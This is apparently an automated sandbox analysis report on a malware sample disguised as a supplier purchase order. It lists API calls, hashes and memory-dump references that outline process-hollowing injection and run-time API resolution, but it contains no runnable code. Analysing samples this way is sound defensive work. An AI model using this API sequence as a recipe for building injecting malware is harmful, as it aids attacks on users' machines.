                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 45b22de0f520c0edc3fad335bb63b7213b6ca67dc4f3a5e3bd995dabc279981f
                                    • Instruction ID: 0d26ab5f9435390bb2cceb8dbaebb2ff5abb77b9b22b7328e07629795a0eca28
                                    • Opcode Fuzzy Hash: 45b22de0f520c0edc3fad335bb63b7213b6ca67dc4f3a5e3bd995dabc279981f
                                    • Instruction Fuzzy Hash: CCA1A337E0020A9FCF15DFB4C84049EBBB6FF85301B1545ADEA09AB265DB71D915CB40
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 909d29104bd382271ac25beb2b67225f54be6a1f816d639c1b3a56800222736a
                                    • Instruction ID: f7e2a8b63263ebb2fe034bb4bf594978a5a5726f16287d97e0474a50bed0523f
                                    • Opcode Fuzzy Hash: 909d29104bd382271ac25beb2b67225f54be6a1f816d639c1b3a56800222736a
                                    • Instruction Fuzzy Hash: 7551F974E002198FDB14CFA9C5805AEFBF2FF89315F24816AD459AB316D735AA42CF60

                                    Execution Graph

                                    Execution Coverage:11.5%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:260
                                    Total number of Limit Nodes:23
                                    execution_graph (rendered as a graph figure in the original report; the raw node and edge list is omitted here). API calls referenced by graph nodes: Wow64SetThreadContext, ResumeThread, WriteProcessMemory, ReadProcessMemory, CreateProcessA, VirtualAllocEx, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, CreateActCtxA, GetModuleHandleW, PostMessageW, DuplicateHandle.

                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 00EED566
                                    • GetCurrentThread.KERNEL32 ref: 00EED5A3
                                    • GetCurrentProcess.KERNEL32 ref: 00EED5E0
                                    • GetCurrentThreadId.KERNEL32 ref: 00EED639
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2240306657.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_ee0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID: q&5
                                    • API String ID: 2063062207-3334626113
                                    • Opcode ID: f5f1f42b75b544efabb6431b97cc806124b1a173341fbce60f0538559d2b6798
                                    • Instruction ID: 524540508fdcfe61a97103b8e5f22f53518df93778049903ca515b6e9442f9f1
                                    • Opcode Fuzzy Hash: f5f1f42b75b544efabb6431b97cc806124b1a173341fbce60f0538559d2b6798
                                    • Instruction Fuzzy Hash: C3B18071A00249CFCB14DFAAD948AAEBBF1FF89304F248469E409BB361DB759D45CB50

                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 00EED566
                                    • GetCurrentThread.KERNEL32 ref: 00EED5A3
                                    • GetCurrentProcess.KERNEL32 ref: 00EED5E0
                                    • GetCurrentThreadId.KERNEL32 ref: 00EED639
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2240306657.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_ee0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID:
                                    • API String ID: 2063062207-0
                                    • Opcode ID: 39e53cde5530389aebf8991a9b8b0f32b47002a982c8a212d7bc5e82b3361bee
                                    • Instruction ID: 02d17317eea0f6abbf122483b5d35cc6c648a2f5ab821510cd95d2c5477c1ad9
                                    • Opcode Fuzzy Hash: 39e53cde5530389aebf8991a9b8b0f32b47002a982c8a212d7bc5e82b3361bee
                                    • Instruction Fuzzy Hash: B95147B0904349CFDB14DFAAD948BAEBBF5FF88304F208459E419A7260D7789984CF65

                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076B4D46
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: ef3a01ed0a19a9ea65ec770c3b4390ec960219c62ab72e093a28b2c280f03afc
                                    • Instruction ID: 566069b5418d431884d641cdb255ce73cab39a9520fc284da592538427237269
                                    • Opcode Fuzzy Hash: ef3a01ed0a19a9ea65ec770c3b4390ec960219c62ab72e093a28b2c280f03afc
                                    • Instruction Fuzzy Hash: 15A17DB1D0025ADFDF20CFA8C8417EDBBB2BF49310F1485AAD819A7251DB749985CF92

                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076B4D46
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 936459ed18ef0933aef260458750a7e7324725fcfc0e1db6684427678202f645
                                    • Instruction ID: 02361cc3a6af4659e626176b9085e513ac171c9eeede75bf2df12291c7809abc
                                    • Opcode Fuzzy Hash: 936459ed18ef0933aef260458750a7e7324725fcfc0e1db6684427678202f645
                                    • Instruction Fuzzy Hash: EE917DB1D0025ACFDB24CFA8C8417EDBBB2BF49310F14856AD819A7251DB749985CF91

                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00EEB09E
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2240306657.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_ee0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: 257f2770efa4afff0d0e4f7e498b7b89fb199528d0886399dd3dad582244a7fc
                                    • Instruction ID: 02b634f3a8af91d99b08d5eb7b3ccab6c2fbff64afd17cea3dead82e2bce0d1d
                                    • Opcode Fuzzy Hash: 257f2770efa4afff0d0e4f7e498b7b89fb199528d0886399dd3dad582244a7fc
                                    • Instruction Fuzzy Hash: D68146B0A00B898FDB24DF2AD45579ABBF1BF88304F148A2DD086E7A50D735F945CB91

                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 00EE59C9
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2240306657.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_ee0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: 39b9707d3e381b83f01e5c8e0ee6de6dca1b02980c3ecf42993a7bef39a78924
                                    • Instruction ID: fb2139056d9d5ff0ebc4fb9d831168a35a7b5faa2268254ad2ba50cee06698ce
                                    • Opcode Fuzzy Hash: 39b9707d3e381b83f01e5c8e0ee6de6dca1b02980c3ecf42993a7bef39a78924
                                    • Instruction Fuzzy Hash: 3D41E2B1C0065DCADB24CFAAC984BDDBBF5BF49308F20816AD408AB255DBB55946CF90

                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 00EE59C9
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2240306657.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_ee0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: 6485408caaa93db8aae56126913097b7289f92cce38781f71378e7f471c64102
                                    • Instruction ID: 882e5a15b709360abe3fd0ab320a6cd53c9816b741d273d280b24a8524c6e413
                                    • Opcode Fuzzy Hash: 6485408caaa93db8aae56126913097b7289f92cce38781f71378e7f471c64102
                                    • Instruction Fuzzy Hash: 1941E2B1C0071DCADB24CFAAC944B9DBBF5BF49304F20806AD408AB255DBB56945CF90

                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076B4918
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: 40fe8ec11a9a4e3a15bc5baf6a253a104ccdbb823479cc408552e37439e3cdd2
                                    • Instruction ID: 42d7da1d6405489c5c4e7fd3874862ae9723d15add331c29735f59bfcc6826de
                                    • Opcode Fuzzy Hash: 40fe8ec11a9a4e3a15bc5baf6a253a104ccdbb823479cc408552e37439e3cdd2
                                    • Instruction Fuzzy Hash: 4D2148B5900259DFCB10DFA9C981BEEBFF5FF48310F10842AE919A7250C7789984CBA0
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076B4918
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: 2f0e79cb139eeb9fa3bd26cf80449f6717a3fd1603bf68a0cb5a28b05a19c8a1
                                    • Instruction ID: f94ee1f3cdd04094422675ad40ec8021ba1543615c5184362f6ef3a77d91dda9
                                    • Opcode Fuzzy Hash: 2f0e79cb139eeb9fa3bd26cf80449f6717a3fd1603bf68a0cb5a28b05a19c8a1
                                    • Instruction Fuzzy Hash: 81210AB5900359DFCB10DFAAC985BDEBBF5FF48310F108429E519A7251D7789944CBA0
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076B49F8
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: 6bb7a5339e0fadd66fed580c65786395db60ebf8d00b549d97c4b5f482acf550
                                    • Instruction ID: 61a9c444607d73b4c83fa5e4f23dca4c9d758fd1e0fad55a44430d92fc1979c2
                                    • Opcode Fuzzy Hash: 6bb7a5339e0fadd66fed580c65786395db60ebf8d00b549d97c4b5f482acf550
                                    • Instruction Fuzzy Hash: 9C214AB58003599FCB10DFAAD840AEEFFF5FF48320F10842AE919A7251C7789944CBA1
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EED7B7
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2240306657.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_ee0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: ce4a447d107a714787d079c4ae488cd08b988040c1af9f52c8cc52558597b6c8
                                    • Instruction ID: 50438befa4bc6005e4bef1ce0026151a57921c098811adc86a83cbd3c9591a27
                                    • Opcode Fuzzy Hash: ce4a447d107a714787d079c4ae488cd08b988040c1af9f52c8cc52558597b6c8
                                    • Instruction Fuzzy Hash: 8B21E0B5900248DFDB10CFAAD985AEEBFF5EB48310F14841AE958B3310D379A945CFA1
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076B476E
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: d8b826235756d4fe93c67bb8fb31acea538b715ce50ecc79c4753c82f04502fd
                                    • Instruction ID: c5c1d716d41559c3e4fc95fba9173554fa5b3d97a82277c96d0417ae103d9d05
                                    • Opcode Fuzzy Hash: d8b826235756d4fe93c67bb8fb31acea538b715ce50ecc79c4753c82f04502fd
                                    • Instruction Fuzzy Hash: 742135B5D002498FDB10DFAAC5857EEBFF5EF49310F14842AD85AA7240DB789984CFA0
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076B476E
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: cc2901ca5063545ae6b365a6f72ee1ae3f2dadf978dba83b8319994abd4550d4
                                    • Instruction ID: 83578238dfb19c10a29d469bfa0695361f91f3c2f1837d0535297e464506ba6d
                                    • Opcode Fuzzy Hash: cc2901ca5063545ae6b365a6f72ee1ae3f2dadf978dba83b8319994abd4550d4
                                    • Instruction Fuzzy Hash: C12138B59002098FDB10DFAAC4857EEBBF4EF49310F10842AD419A7241DB78A984CFA0
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076B49F8
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: ae1cfdcd98bd0f9e2948c14a6d3730b14e2655ab8b4454cabb64334c83c2c2dc
                                    • Instruction ID: fb85aee6a147d105ee6de321e59c83409f42dd65c0fb5dc6234cda6f1b8548c8
                                    • Opcode Fuzzy Hash: ae1cfdcd98bd0f9e2948c14a6d3730b14e2655ab8b4454cabb64334c83c2c2dc
                                    • Instruction Fuzzy Hash: 512128B18002599FCB10DFAAC840AEEBBF5FF48310F10842AE519A7250C778A940CBA0
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EED7B7
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2240306657.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_ee0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: d11369eec755b6f28289a64d226263d31478912cd8dcf47f57ef07ba4f4eac7e
                                    • Instruction ID: 92793ea6d47845ae1762b0d19e5c14073161cb2fe03fa02c1d8c40916e797a41
                                    • Opcode Fuzzy Hash: d11369eec755b6f28289a64d226263d31478912cd8dcf47f57ef07ba4f4eac7e
                                    • Instruction Fuzzy Hash: 8821C2B5900248DFDB10CFAAD984ADEBBF9FB48310F14841AE918B3350D378A944CFA5
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076B4836
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 900c4a657e813756865bdcc52ffc90f12b8cf4046c26ad1b0b97f38b3aa8abfe
                                    • Instruction ID: 1dee82a4191346222cdba7a2a21683c148191ee996eca83e747925a4bfeb2755
                                    • Opcode Fuzzy Hash: 900c4a657e813756865bdcc52ffc90f12b8cf4046c26ad1b0b97f38b3aa8abfe
                                    • Instruction Fuzzy Hash: DD1129B59002499FCB20DFAAD9446EFBFF5EF49310F14841AE519A7250CB799544CFA0
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076B4836
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 076B7CAD
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
                                    • API String ID: 410705778-0
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 076B7CAD
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2249103186.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_76b0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
                                    • API String ID: 410705778-0
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00EEB09E
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2240306657.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_ee0000_keHuNxIumw.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0

                                    Execution Graph

                                    Execution Coverage:1.1%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:4.6%
                                    Total number of Nodes:517
                                    Total number of Limit Nodes:9

                                    Control-flow Graph

                                    APIs
                                    • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                    • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                    • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                    • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                    • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                    • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                    • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                    • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                    • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                    • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                    • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                    • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD17
                                    • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040EA1C), ref: 0041CD28
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD2B
                                    • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD3B
                                    • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD4B
                                    • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040EA1C), ref: 0041CD5D
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD60
                                    • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040EA1C), ref: 0041CD6D
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD70
                                    • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD84
                                    • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CD98
                                    • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040EA1C), ref: 0041CDAA
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CDAD
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040EA1C), ref: 0041CDBA
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CDBD
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040EA1C), ref: 0041CDCA
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CDCD
                                    • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040EA1C), ref: 0041CDDA
                                    • GetProcAddress.KERNEL32(00000000), ref: 0041CDDD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad$HandleModule
                                    • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                    • API String ID: 4236061018-3687161714
                                    • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                    • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                    • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                    • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                    Control-flow Graph

                                    • Control-flow graph for sub_443355 (interactive in the original report): entry block 443355-443361 calls 448d49; GetPEB at 443363-443371; from there either GetCurrentProcess/TerminateProcess (443373-44337d) or the call to 4433da followed by ExitProcess (443383-44338f).
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG,004461B7,00000003), ref: 00443376
                                    • TerminateProcess.KERNEL32(00000000), ref: 0044337D
                                    • ExitProcess.KERNEL32 ref: 0044338F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID: PkGNG
                                    • API String ID: 1703294689-263838557
                                    • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                    • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                    • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                    • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88

                                    Control-flow Graph

                                    • Control-flow graph for sub_40EA00 (interactive in the original report; blocks 40ea00-40f3ea, edge data not reproduced). API calls recoverable from the block list, in address order: call 41cbe1 (the run-time API resolver) and GetModuleFileNameW in the entry block 40ea00-40ea82; call 40d0a4 (CreateMutexA/GetLastError) at 40ec3e; CreateThread in blocks 40effe, 40f103, 40f158, 40f1a9, 40f27e, 40f293 and 40f2a8; StrToIntA in block 40f025-40f101; DeleteFileW at 40f381-40f386, reached again through a Sleep block (40f36f-40f37c) when the delete fails.
                                    APIs
                                      • Part of subcall function 0041CBE1: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                      • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                      • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                      • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                      • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
